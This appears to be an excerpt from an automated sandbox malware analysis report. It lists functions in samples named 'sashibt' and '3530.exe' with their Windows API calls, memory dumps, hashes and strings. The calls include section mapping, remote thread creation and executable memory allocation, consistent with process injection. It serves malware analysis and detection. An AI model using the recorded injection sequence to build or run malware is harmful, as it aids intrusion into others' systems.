Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 02644029 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0264407A

Memory Dump Source

Source File: 00000004.00000002.2333466076.000000000263D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0263D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_263d000_sashibt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f30d3408eb36bed98279b8967fd8f4a6c23432046a2bb3432f473edd416791ab
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: A4113979A00248EFDB01DF98C985E98BBF5AF08751F0580A4F9889B361D771EA90DF85

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000004.00000002.2332342823.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Analysis Process: sashibtPID: 4072, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	36.2%
Signature Coverage:	0%
Total number of Nodes:	80
Total number of Limit Nodes:	3

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 025E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 025E024D

Strings

kernel32.dll, xrefs: 025E008F, 025E0095
cess, xrefs: 025E018D

Memory Dump Source

Source File: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_25e0000_sashibt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c97db3b646984794bd1160e20933eaed74d62d05f938e549ae04c2f16b3e5529
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 2C526974A01229DFDB64CF58C985BACBBB1BF09314F1480D9E54EAB391DB70AA85CF14

Function 02667502 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0266752A
Module32First.KERNEL32(00000000,00000224), ref: 0266754A

Memory Dump Source

Source File: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2660000_sashibt.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a12fef7a0e2605364112d17ab495394c73459f804128dd820d6c5cfa72c1f589
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D8F090326007106BE7213BF9A88DB7EF6ECEF49729F1005A9E643D15C0DF74E8458A61

Function 025E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025E0223,?,?), ref: 025E0E19
SetErrorMode.KERNELBASE(00000000,?,?,025E0223,?,?), ref: 025E0E1E

Memory Dump Source

Source File: 00000007.00000002.2706511521.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_25e0000_sashibt.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1cacf028484974530ae65c6e85c24824324feaa6d5fdbaaae33983dc66bd837b
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 9AD0123114512877DB003A94DC09BCD7F1CDF05B66F008021FB0DE9080C7B0954046E9

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 026671C1 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02667212

Memory Dump Source

Source File: 00000007.00000002.2706710751.0000000002660000.00000040.00000020.00020000.00000000.sdmp, Offset: 02660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2660000_sashibt.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 2125b1a1cff33e4040d10b9e0bd7605fd40d3026fcda550b36217e475139f3f2
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: CF112B79A00208EFDB01DF98C989E98BBF5EF08350F158094F9489B361D371EA50EF84

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000007.00000002.2705374767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sashibt.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Analysis Process: 3530.exePID: 2860, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.4%
Total number of Nodes:	124
Total number of Limit Nodes:	22

Executed Functions

Function 00007FF7A09AE810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON

Download Yara Rule

Strings

U8PB, xrefs: 00007FF7A09B1CC2
dfb, xrefs: 00007FF7A09B05AA
SQ>, xrefs: 00007FF7A09B1C5C
U8PB, xrefs: 00007FF7A09B1CD7
5no, xrefs: 00007FF7A09B000D
yl, xrefs: 00007FF7A09AFC52
{3\M, xrefs: 00007FF7A09AEFCC
SQ>, xrefs: 00007FF7A09B0703
|3\M, xrefs: 00007FF7A09AF630
cpHi, xrefs: 00007FF7A09AFCB2
c$&o, xrefs: 00007FF7A09B0CDF
dl!, xrefs: 00007FF7A09B207D
g1E, xrefs: 00007FF7A09B1C28
LK@f, xrefs: 00007FF7A09AF1C6
u|, xrefs: 00007FF7A09AEBDC
b~D+, xrefs: 00007FF7A09AE980
nF, xrefs: 00007FF7A09B173D
hTw*, xrefs: 00007FF7A09B1DE8
d6M , xrefs: 00007FF7A09AFE7A
|3\M, xrefs: 00007FF7A09B389D
5no, xrefs: 00007FF7A09B0CEB
U8PB, xrefs: 00007FF7A09B158F
e6M , xrefs: 00007FF7A09B1082
!@X, xrefs: 00007FF7A09AEE4F
GSw', xrefs: 00007FF7A09B20B5
#{j, xrefs: 00007FF7A09B08B4
SQ>, xrefs: 00007FF7A09B309C
pcR, xrefs: 00007FF7A09AFF14
!@X, xrefs: 00007FF7A09AFEFD
GSw', xrefs: 00007FF7A09B0E6C
c~D+, xrefs: 00007FF7A09B00FF
v'Hu, xrefs: 00007FF7A09AF4D5
dl!, xrefs: 00007FF7A09B108E
mF, xrefs: 00007FF7A09AEA08
{F"7, xrefs: 00007FF7A09B13AD
cpHi, xrefs: 00007FF7A09B021A
yl, xrefs: 00007FF7A09B212F
dfb, xrefs: 00007FF7A09B21BC
LK@f, xrefs: 00007FF7A09B39C0
29K&, xrefs: 00007FF7A09B182C
c~D+, xrefs: 00007FF7A09B22B3
nF, xrefs: 00007FF7A09AF702
#{j, xrefs: 00007FF7A09AFAB9
29K&, xrefs: 00007FF7A09B1594
SQ>, xrefs: 00007FF7A09B30AD
U8PB, xrefs: 00007FF7A09B15A2
hTw*, xrefs: 00007FF7A09B09E2
e6M , xrefs: 00007FF7A09B325C
v'Hu, xrefs: 00007FF7A09B0864
U8PB, xrefs: 00007FF7A09B100E
u|, xrefs: 00007FF7A09B0EA9
xl, xrefs: 00007FF7A09AF138
c$&o, xrefs: 00007FF7A09B14B8
e6M , xrefs: 00007FF7A09B149D
yl, xrefs: 00007FF7A09AE874
29K&, xrefs: 00007FF7A09B0E60

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
API String ID: 0-1998008778
Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction ID: b7d36a33e81f668a3f1aeb6674e0f43b13f81c1e5949ec87abeab8d7b09b0316
Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction Fuzzy Hash: 7C83EB26E0A6C3C9FB786B3898B43BD6291EF55304F91883AC64E4BBF4DE2C75514361

Function 00007FF7A0A0F310 Relevance: 3.1, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.KERNELBASE ref: 00007FF7A0A0F3E6
CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF7A09AB07B), ref: 00007FF7A0A0F442

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: AllocateCheckInitializeMembershipToken
String ID:
API String ID: 1663163955-0
Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction ID: f7a34fa1cdca65758ed162ee27c4944b7160ab54317a0c692e55ced3de28dd2b
Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction Fuzzy Hash: 9A31E67650D74686E6248F25F46073FA7A0FB84750F500439EA8E1BFA8EF3CE4488B01

Function 00007FF7A0A107D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

